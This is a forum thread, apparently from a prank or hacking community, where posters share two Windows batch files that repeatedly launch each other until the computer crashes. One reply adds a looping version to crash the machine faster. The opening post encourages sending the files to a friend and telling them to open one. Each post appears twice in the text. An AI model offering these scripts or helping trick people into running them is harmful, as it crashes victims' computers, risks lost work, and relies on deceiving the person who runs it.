Login Register






Thread Rating:
  • 0 Vote(s) - 0 Average


[PRANK OR SERIOUS] Batch command filter_list
Author
Message
[PRANK OR SERIOUS] Batch command #1
This is one of the simplest batch scripts ever

i discovered it on my friend pc...guess wht happened after tht(u will figure out at the end of this topic)

open a new notepad and type

Code:
start crash2.bat


save it as crash1.bat

open another new notepad and type

Code:
start crash1.bat


save it as crash2.bat

Evil double clik either and they would open up simultaneously and continuously...and then it would crash Biggrin...after creating this send this file to one of ur friends and tell them to open either....guess u know the answer now Tongue

Reply

[PRANK OR SERIOUS] Batch command #2
This is one of the simplest batch scripts ever

i discovered it on my friend pc...guess wht happened after tht(u will figure out at the end of this topic)

open a new notepad and type

Code:
start crash2.bat


save it as crash1.bat

open another new notepad and type

Code:
start crash1.bat


save it as crash2.bat

Evil double clik either and they would open up simultaneously and continuously...and then it would crash Biggrin...after creating this send this file to one of ur friends and tell them to open either....guess u know the answer now Tongue

Reply

RE: [PRANK OR SERIOUS] Batch command #3
hehe nice one the first will open the second and the second will open the first Biggrin
Pierce the life fibers with your drill.

Reply

RE: [PRANK OR SERIOUS] Batch command #4
hehe nice one the first will open the second and the second will open the first Biggrin
Pierce the life fibers with your drill.

Reply

RE: [PRANK OR SERIOUS] Batch command #5
yeah and finally it would crash the pc Evil

Reply

RE: [PRANK OR SERIOUS] Batch command #6
yeah and finally it would crash the pc Evil

Reply

RE: [PRANK OR SERIOUS] Batch command #7
cool Smile

to improve it a bit you can add a loop:

Code:
:loop
start crash2.bat
goto loop

Code:
:loop
start crash1.bat
goto loop

then you will crash pc a lot faster Smile
Staff will never ever ask you for your personal information.
We know everything about you anyway.

Reply

RE: [PRANK OR SERIOUS] Batch command #8
cool Smile

to improve it a bit you can add a loop:

Code:
:loop
start crash2.bat
goto loop

Code:
:loop
start crash1.bat
goto loop

then you will crash pc a lot faster Smile
Staff will never ever ask you for your personal information.
We know everything about you anyway.

Reply

RE: [PRANK OR SERIOUS] Batch command #9
lol 1lussion is right that will make it alot faster then the normal opening eachother Tongue
Pierce the life fibers with your drill.

Reply

RE: [PRANK OR SERIOUS] Batch command #10
lol 1lussion is right that will make it alot faster then the normal opening eachother Tongue
Pierce the life fibers with your drill.

Reply







Users browsing this thread: 1 Guest(s)